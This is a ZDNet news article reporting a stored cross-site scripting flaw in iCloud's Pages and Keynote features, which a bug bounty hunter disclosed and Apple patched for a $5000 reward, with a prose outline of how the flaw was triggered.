Stored XSS bug in Apple iCloud domain disclosed by bug bounty hunter

The cross-site scripting bug reportedly earned the researcher a $5000 reward.
Written by Charlie Osborne, Contributing Writer

A stored cross-site scripting (XSS) vulnerability in the iCloud domain has reportedly been patched by Apple. 

Bug bounty hunter and penetration tester Vishal Bharad claims to have discovered the security flaw, which is a stored XSS issue in icloud.com. 

Stored XSS vulnerabilities, also known as persistent XSS, can be used to store payloads on a target server, inject malicious scripts into websites, and potentially be used to steal cookies, session tokens, and browser data. 

According to Bharad, the XSS flaw in icloud.com was found in the Page/Keynotes features of Apple's iCloud domain.
In order to trigger the bug, an attacker needed to create new Pages or Keynote content with an XSS payload submitted into the name field.  

This content would then need to be saved and either sent or shared with another user. An attacker would then be required to make a change or two to the malicious content, save it again, and then visit "Settings" and "Browser All Versions."  

After clicking on this option, the XSS payload would trigger, the researcher said.  

Bharad also provided a Proof-of-Concept (PoC) video to demonstrate the vulnerability. 

The researcher disclosed the bug to Apple on August 7, 2020. The report was accepted and Bharad received a $5000 financial reward for his efforts on October 9. 

Bug bounty programs, such as those offered by HackerOne and Bugcrowd, remain a popular method for external researchers to report security issues to technology vendors. In 2020 alone, Google paid bug bounty hunters $6.7 million for their reports. 

ZDNet has reached out to Apple for comment and will update when we hear back.

Previous and related coverage

Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

Editorial standards